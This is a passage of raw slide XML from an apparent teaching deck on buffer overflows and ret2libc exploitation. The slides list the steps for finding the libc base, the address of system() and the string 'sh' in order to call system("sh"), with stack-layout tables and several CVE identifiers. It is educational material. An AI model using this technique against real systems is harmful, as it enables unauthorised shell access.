          <a:ext cx="3301683" cy="1584960"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1052796">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3557023095"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2248887">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0x40101a</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514467" y="2022566"/>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8CB68250-E124-EE51-D44D-CCB817BA2076}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1086804" y="1616750"/>
            <a:ext cx="7047311"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9" name="Arrow: Up 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1C5567E-190B-AC6A-E30D-39768F181801}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="802678" y="4080421"/>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4" name="Content Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADE8842B-8C33-A50A-263E-CDFEF56E9475}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="576071" y="5048317"/>
            <a:ext cx="4849598"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="584338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dirty="0"/>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35664" y="1982755"/>
            <a:ext cx="4525346" cy="46653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3024673"/>
            <a:ext cx="8623040" cy="2519265"/>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0A783B-B6BB-20CD-68EC-C63634E9C22B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8257591" y="2978020"/>
            <a:ext cx="25332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Load </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>libc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" err="1">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="Garamond" panose="02020404030301010803"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>  library</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1359037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dirty="0">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100304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4424264"/>
            <a:ext cx="8623040" cy="1119674"/>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Calculate </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" err="1">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="Garamond" panose="02020404030301010803"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> base</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>  address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="499904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dirty="0">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2379306"/>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4906346"/>
            <a:ext cx="8623040" cy="637592"/>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Calculate </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" err="1">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="Garamond" panose="02020404030301010803"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>  system() </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>  address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="65188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dirty="0">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2954693"/>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flipV="1">
            <a:off x="1527888" y="5543938"/>
            <a:ext cx="8623040" cy="46652"/>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Locate </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" err="1">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="Garamond" panose="02020404030301010803"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>  "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>\0"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="Garamond" panose="02020404030301010803"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>  inside </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>libc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="211142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dirty="0">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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10450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604141823"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8761546" y="1707532"/>
          <a:ext cx="2630109" cy="42672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sh_addr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990052668"/>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3704047267"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5481651" y="4573782"/>
          <a:ext cx="2955763" cy="170688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lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2200" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>0x0</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="22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lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2200" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>0x401273</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2200">
                        <a:latin typeface="Consolas"/>
                      </a:endParaRP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382283" y="3754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6" name="Rectangle: Rounded Corners 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7377B852-0F08-6E3F-F948-2E12CEFB893B}"/>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3" name="Arrow: Up 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4ABE5DB5-18C0-7696-05CB-FAF4E15369B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="762282" y="2974910"/>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5" name="Content Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92A259AB-FC88-AE7E-CB81-4F131D1032BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="972311" y="5109277"/>
            <a:ext cx="4849598" cy="624059"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>system(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="421477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3018281574"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8752253" y="2475024"/>
          <a:ext cx="2630109" cy="353568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1800"/>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1800"/>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3312310701"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5463979" y="4568834"/>
          <a:ext cx="2955763" cy="170688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lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2200" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas"/>
                        </a:rPr>
                        <a:t>0x401273</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2200">
                        <a:latin typeface="Consolas"/>
                      </a:endParaRP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382283" y="3754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08877DB6-8238-CE9A-9FCC-DE5FB4BBF8FC}"/>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6" name="Arrow: Up 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C18C9A47-C368-9BFB-8F79-702032282DF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="718987" y="3373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216685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is Buffer Overflow (BOF) relevant?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 19" descr="Logo, icon&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B9E06A6-F273-B33C-611F-E7B7065979CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5393473" y="1614367"/>
            <a:ext cx="1659054" cy="488338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 8" descr="A picture containing text, electronics, indoor, projector&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79108861-A512-E866-C66B-6F98622D34C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="946260" y="3366185"/>
            <a:ext cx="2743200" cy="1543050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74F385C5-94E8-7A80-1CB5-8334FAF41EE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1016619" y="2856571"/>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rgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>CVE-2021-36194</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 17" descr="A picture containing diagram&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{259C43EC-0FA3-012C-65A6-51F4CC32F1A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6224957" y="4126284"/>
            <a:ext cx="3858322" cy="2031051"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95C86D0B-F1D3-EDCD-1BD4-0031D534B561}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6723383" y="5527583"/>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222222"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>CVE-2022-3602</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600">
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 15" descr="A picture containing icon&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{060842D9-52D6-983F-C066-22E561C900E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8845283" y="1910196"/>
            <a:ext cx="2743200" cy="2743200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 6" descr="A picture containing electronics, printer, white&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CD8FE7F-1B73-73C9-DC5C-34F05B116D47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4396832" y="2317172"/>
            <a:ext cx="2743200" cy="2743200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FA337B1-FED0-F132-C628-8F322D20C610}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4025169" y="5034447"/>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444444"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>CVE-2022-28721</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23D827CB-B47F-5FAC-3110-DDE575504D9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9060281" y="4655761"/>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000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>CVE-2022-2471</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="360487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591989137"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8752253" y="1912183"/>
          <a:ext cx="2630109" cy="36576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1603060426"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5472638" y="4560175"/>
          <a:ext cx="3202549" cy="1706880"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1021186">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3557023095"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2181363">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system_addr</a:t>
                      </a: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427479" y="2770261"/>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F7B5801C-1D0D-6E2A-9DEB-E68F770969B7}"/>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6" name="Arrow: Up 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA6C28C1-5300-230D-BB36-361587620C72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="736305" y="3728252"/>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240367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164734447"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8752253" y="1912183"/>
          <a:ext cx="2630109" cy="36576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418820" y="2709647"/>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5" name="Rectangle: Rounded Corners 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36760179-167C-9C09-F7B5-5C14D4E4C849}"/>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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Table 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F9D9B9E-7E29-CC3B-F64B-43D17C64E4D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2069172448"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5472638" y="4560175"/>
          <a:ext cx="3202549" cy="1706880"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1021186">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3557023095"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2181363">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system_addr</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4228833141"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
